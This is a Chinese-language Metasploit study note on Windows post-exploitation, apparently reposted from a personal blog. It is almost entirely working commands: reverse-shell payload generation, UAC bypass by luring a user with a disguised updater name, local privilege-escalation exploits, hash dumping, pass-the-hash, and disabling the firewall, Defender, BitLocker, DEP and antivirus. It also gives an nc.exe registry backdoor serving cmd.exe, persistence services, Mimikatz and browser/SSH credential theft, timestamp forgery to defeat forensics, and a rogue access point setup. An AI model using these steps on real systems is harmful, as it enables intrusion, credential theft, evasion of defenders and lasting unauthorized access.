MSF學習(12)后滲透階段 (13)armitage 圖形化前端


十二:后滲透階段

提權,信息收集,滲透內網,永久后門

1:基於已有的session擴大戰果

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=1234 -e x86/shikata_ga_nai -f vba-exe

演示就不利用漏洞,直接用payload進行獲得shell

root@kali:~#  msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=1234 -b "\x00"  -e x86/shikata_ga_nai -i 7 -o kk.exe(32位)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=7777 -f exe -o ak.exe(64位)

把exe復制到阿帕奇網站目錄,便於widows7下載

root@kali:~# cp kk.exe /var/www/html/

 

 

 

 

 

msf5 use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.10

msf5 exploit(multi/handler) > set lport 7777

msf5 exploit(multi/handler) > exploit

 

 

 

 

 

2:獲取系統帳號權限

 

 

 

 

被拒絕,UAC權限限制,需要繞過

3:繞過UAC權限限制

 

(1)

msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/ask

msf5 exploit(windows/local/ask) > show options

msf5 exploit(windows/local/ask) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(windows/local/ask) > set lhost 192.168.1.10

msf5 exploit(windows/local/ask) > set filename wn_updata.exe

msf5 exploit(windows/local/ask) > set session 1

msf5 exploit(windows/local/ask) > exploit

名字取好一點,用戶點擊就可以繞過UAC

 

 

 

 

成功獲得系統權限

 

 

 

 

 

(2)(64位操作系統windows7為例子,無須誘導即可UAC繞過)

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac

msf5 exploit(windows/local/bypassuac) > show options

msf5 exploit(windows/local/bypassuac) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(windows/local/bypassuac) > set lhost 192.168.1.10

msf5 exploit(windows/local/bypassuac) > set session 1

msf5 exploit(windows/local/bypassuac) > show targets

msf5 exploit(windows/local/bypassuac) > set target 1

 

 

 

 

成功

 

 

 

 

Hashdump(取得系統的sessions就可以把hash dump出來)

 

(3)msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/bypassuac_injection

由於我的版本是64位,所以失敗了,不過前面這個雖然也需要32位版本,但成功了

 

 

 

 

 

4:利用本地漏洞直接提權

(1)版本需求,32位

 

 

 

 

 

 

msf5 exploit(windows/local/bypassuac_injection) > use exploit/windows/local/ms13_053_schlamperei

 

 

 

set target 1

 

(2)32位

msf5 exploit(windows/local/ms13_053_schlamperei) > use exploit/windows/local/ms13_081_track_popup_menu

 

(3)其他模塊

msf5 exploit(windows/local/ms13_081_track_popup_menu) > use exploit/windows/local/ms13_097_ie_registry_symlink

msf5 exploit(windows/local/ms13_097_ie_registry_symlink) > use exploit/windows/local/ppr_flatten_rec

 

可以選擇多種模塊來試一試

 

 

(4)可視化payload,可以進行控制

在sessions的基礎下可以

msf5 exploit(windows/local/bypassuac) > set payload payload/windows/vncinject/reverse_tcp

msf5 exploit(windows/local/bypassuac) > set viewonly no(這個就是控制的關鍵)

 

 

 

 

 

 

 

 

 

 

 

成功

 

Hashdump(基於系統權限)

可能會報錯

 

 

 

 

 

解決:

meterpreter >  getprivs

再把進程遷移到系統進程即可

 

 

 

 

5:使用哈希密碼進行密碼身份認證

msf5 exploit(windows/local/bypassuac) > use exploit/windows/smb/psexec

msf5 exploit(windows/smb/psexec) > show options

msf5 exploit(windows/smb/psexec) > set rhosts 192.168.1.8

msf5 exploit(windows/smb/psexec) > set smbuser delusion

msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:d0c9ab2c9d99e0a93f1707

msf5 exploit(windows/smb/psexec) > exploit

 

 

 

 

 

 

 

 

記得設置payload

成功

PS:需要提前關閉uac

步驟:進入shell

 

 

 

 

依次輸入這些命令再重啟即可

 

 

 

 

 

 

6:關閉windwos防火牆

需要管理員和system權限

在shell里面執行命令

 

 

 

 

C:\Windows\system32>netsh advfirewall set allprofiles state off

 

 

 

 

打開用on

 

7:關閉windefend(windows自己的防護)

C:\Windows\system32>net stop windefend

 

 

 

 

 

 

8:bitlocker磁盤加密(關閉windows的磁盤加密)

C:\Windows\system32>manage-bde -off C(關閉加密)

C:\Windows\system32>manage-bde -status(看是否加密)

應該是中文原因所以亂碼了,但還是可以看到

 

 

 

 

 

9:關閉DEP(硬件防護系統)

關閉成功

C:\Windows\system32>bcdedit.exe /set {current} nx AlwayxOff

 

10:殺死防病毒軟件

(1)meterpreter > run killav

 

 

 

 

(2)meterpreter > run post/windows/manage/killav

 

 

 

 

 

11:啟動遠程管理工具

(1)

meterpreter > run  post/windows/manage/enable_rdp

打開遠程端口和服務,會自動保存一個關閉文件

 

 

 

 

root@kali:~# rdesktop 192.168.1.8

遠程連接

關閉遠程桌面服務

meterpreter > run multi_console_command -r /root/.msf4/loot/20200521092947_default_192.168.1.8_host.windows.cle_029447.txt

 

 

 

 

 

 

 

 

 

 

(2)開啟遠程桌面服務

meterpreter > run getgui -e

 

 

 

 

 

添加遠程桌面帳號,即可以不用知道帳號密碼來遠程桌面

meterpreter > run getgui -u admin -p 123456

注意,有些版本不支持

 

 

 

 

 

12:查看遠程桌面

(1)

meterpreter > screenshot (截圖桌面)

(2)

meterpreter > use espia

meterpreter > screengrab

 

 13:token

use exploit/windows/local/bypassuac

 

 

 

 

 

 

 

 

 

 

 

 

 

 

域環境下比較多,企業環境比較多

 

14:注冊表,前提:已經取得shell

 

 

 

 

 

(1)注冊表添加nc后門服務,適用ip固定的

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C"\windwos\system32\nc.exe -Ldp 444 -e cmd.exe'

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

Key: HKLM\software\microsoft\windows\currentversion\Run

 

 

 

 

 

 

(2)打開防火牆允許端口(meterpreter)

meterpreter > execute -f cmd -i H(隱蔽方式進入命令提示符)

C:\Windows\System32>netsh firewall show opmode(看防火牆狀態)

C:\Windows\System32>netsh firewall add portopening TCP 4444 "Kk"(進程名字,可以具有欺騙性) ENABLE ALL

netsh firewall add portopening TCP 4444 "Kk" ENABLE ALL

C:\Windows\System32>shutdown -r -t 0(重啟即可)

C:\Windows\System32>nc 192.168.1.8 4444  (nc連接即可)

 

 

 

 

 

15:后滲透信息收集抓包

meterpreter > load sniffer (導入模塊)

meterpreter > sniffer_interfaces (查看信息,可用抓包模塊)

meterpreter > sniffer_start 2

meterpreter > sniffer_dump 2 1.cap

 

 

 

 

 

 

 

 

 

 

解碼

meterpreter > background

msf5 exploit(windows/local/bypassuac) > use auxiliary/sniffer/psnuffle

msf5 auxiliary(sniffer/psnuffle) > show options

msf5 auxiliary(sniffer/psnuffle) > set pcapfile /root/1.cap

msf5 auxiliary(sniffer/psnuffle) > run

可以用wireshark也行

 

16:搜索文件

meterpreter > search -f *.ini (全局搜索)

meterpreter > search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.dock(指定目錄搜索)

 

 

 

 

17:john the ripper 破解弱口令

msf5 auxiliary(sniffer/psnuffle) > use post/windows/gather/hashdump (system權限)

msf5 post(windows/gather/hashdump) > show options

msf5 post(windows/gather/hashdump) > set session 2

msf5 post(windows/gather/hashdump) > exploit (結果在/tmp目錄下)

 

簡單密碼破解

exploit即可

 

 

 

 

18:銷毀痕跡,防止電子取證,銷毀文件系統訪問痕跡

(meterpreter基於內存,更隱秘)

 

(1)Mac時間

修改內容會使文件修改時間改變

觀看內容會使文件觀看時間改變

修改文件屬性權限也會使文件修改權限時間改變

 

查看對應的時間

root@kali:~# ls -l 1.txt

root@kali:~# ls -l --time=atime 1.txt

root@kali:~# ls -l --time=ctime 1.txt

root@kali:~# stat 1.txt

root@kali:~# touch -d "2 day ago" 1.txt把時間提前兩天

root@kali:~# touch -t 0101010101 1.txt(對應年月日時分)

 

 

 

 

 

 

 

 

 

可以看到改變了

 

但changge時間不會改變

 

 

 

 

(2)模塊修改時間,能力更大(timestomp)

PS:時間不要改的太離譜

基於meterprter

 

 

 

 

 

 

 

 

Mac都可以修改設置

meterpreter > pwd

meterpreter > ls

 

 

 

 

 

meterpreter > timestomp -v 1.txt.txt(顯示具體信息)

 

 

 

 

 

meterpreter > timestomp 1.txt.txt -f msf.pdf

把1.txt.txt的時間改為與msf.pdf一樣

 

 

 

 

 

自定義改時間

 

 

 

 

-a -c -m -e 對應

Modified       : 2020-05-20 11:33:20 +0800

Accessed      : 2020-05-20 11:27:02 +0800

Created       : 2020-05-20 11:27:02 +0800

Entry Modified: 2020-05-20 11:33:54 +0800

-z 對應全部

 

 

 

 

 

 

 

 

 

 

 

 

 

 

19:pivoting跳板/樞紐/支點5

也就是說先控制一台機器,然后再攻擊其內部網絡的其他機器

msf5 exploit(windows/local/bypassuac) > use auxiliary/scanner/portscan/tcp

 

 

 

 

 

 

 

 

考慮映射ip端口,因為兩邊都有防火牆

 

20:常用的POST模塊

(1):(arp掃描模塊)

meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

 

 

 

 

(2)(看是否為虛擬機)

meterpreter > run post/windows/gather/checkvm

 

 

 

 

(3):(查看hash)

meterpreter > run post/windows/gather/credentials/credential_collector

 

 

 

(4): (裝的軟件以及版本)

meterpreter > run post/windows/gather/enum_applications

 

 

 

 

(5): (當前登錄的用戶)

meterpreter >run post/windows/gather/enum_logged_on_users

 

 

 

 

(6): (查看snmp的配置,如果目標有的話)

meterpreter > run post/windows/gather/enum_snmp

 

 

 

 

(7):(查看local漏洞,本地提權)

meterpreter > run post/multi/recon/local_exploit_suggester

 

 

 

 

(8):(刪除目標系統用戶名對應的帳號)

meterpreter > run post/windows/manage/delete_user USERNAME=admin

(9):(查看配置信息)

meterpreter > run post/multi/gather/env

 

 

 

 

 

 

 

 

(10)查看火狐瀏覽器的帳號密碼

meterpreter > run post/multi/gather/firefox_creds

查看火狐瀏覽器的帳號密碼

(11)收集ssh的密碼信息

meterpreter > run post/multi/gather/ssh_creds

 

(12)(看文件是否為惡意文件)

meterpreter > run post/multi/gather/check_malware REMOTEFILE=C:\\Users\\delusion\\Desktop\\msf.pdf

 

21自動執行meterpreter腳本

就是說用戶一點擊就執行

msf5 exploit(windows/local/bypassuac) > advanced

查看高級選項,一般里面就有自動化腳本選項

msf5 exploit(windows/local/bypassuac) > set AutoRunScript migrate -n explorer.exe(自動遷移到這個系統軟件的腳本)

msf5 exploit(windows/local/bypassuac) > set AutoRunScript  set target 1post/windows/gather/dumplinks(前提必須要把用戶進行調整)

(自動收集快捷方式)

這個腳本只能用一條命令,所有用遷移進程是最好的

msf5 exploit(windows/local/bypassuac) > set InitialAutoRunScript post/windows/gather/dumplinks(意思是先運行auto腳本,再運行這一腳本)];

進行劫持

把www.abcbaidu.com解析為2.2.2.2的ip

 

 

 

 

 

 

 

 

 

22:持久后門

 

 

 

 

(1):meterpreter后門

 

 

 

 

meterpreter > run metsvc -A

 

 

 

 

msf5 exploit(windows/local/bypassuac) > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/metsvc_bind_tcp

msf5 exploit(multi/handler) > set lport 31337

msf5 exploit(multi/handler) > set rhost 192.168.1.8

msf5 exploit(multi/handler) > exploit

后門不理想,密碼沒有,端口一直開 set target 1

(2):持久后門

meterpreter > run persistence -h

 

 

 

 

meterpreter > run persistence -x -r 192.168.1.10 -p 1234

 

 

 

 

meterpreter > exit

msf5 exploit(windows/local/bypassuac) > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.10

msf5 exploit(multi/handler) > set lport 1234

msf5 exploit(multi/handler) > set exitonsession false

msf5 exploit(multi/handler) > exploit -j -z

重啟windwos即可

可以看到成功了

 

 

 

 

 

 

23:MSF延展用法之Mimikatz

meterpreter > getsystem

meterpreter > load mimikatz

meterpreter > help

 

 

 

 

meterpreter >msv(獲取哈希值)

 

 

 

meterpreter > ssp

 

 

 

 

meterpreter > tspkg

(看系統信息和哈希)

 

meterpreter > wdigest

meterpreter > kerberos

(看密碼)

meterpreter > mimikatz_command

 

 

 

 

里面的模塊

 

 

 

 

 

 

 

 

最后一個模塊是拿來玩掃雷游戲的,就別看了有start ,cheat,等功能

24:PHPshell

通過瀏覽器來反彈shell

 

 

 

 

把php拷貝到網站目錄即可,前提得有這個漏洞,可以用dvwa來進行實驗

 

25:web delivery

如果服務器有代碼執行漏洞,可以用dvwa來進行實驗

 

 

 

 

 

26:RFI遠程文件包含

 

 

 

 

 

27:Karmetasploit

 

 

 

 

先用無線偽造AP,然后再用msf模塊對流經的流量進行分析,瀏覽器攻擊

root@kali:~# wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt

下載模塊

 

 

 

 

相當於一個腳本,自己可以設置

偽造ap參考wlan無線筆記

 

基礎架構配置

 

 

 

 

root@kali:~# vi /etc/dhcp/dhcpd.conf

 

 

 

 

 

 

 

 

偽造AP

 

 

 

 

 

 

 

 

就可以了

由於沒有用AP連接網絡,但需要修改才可以造成欺騙效果

 

客戶無法正常上網

root@kali:~# vi karma.rc_.txt

 

 

 

 

 

 

把setg的全部參數全部刪除

 

 

 

 

 

 

 

 

 

 

添加路由和防火牆規則

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@kali:~# iptables -P FORWARD ACCEPT

root@kali:~# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERAD

 

28:十三:armitage 圖形化前端

 

由於msf更新導致其不兼容,所以2020新版

Kali已經沒有了這一軟件,可以安舊版本,或者參考這一博客

https://www.jianshu.com/p/412ce1fc7adc

 

 

 

 

作者有點懶。。。。。

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM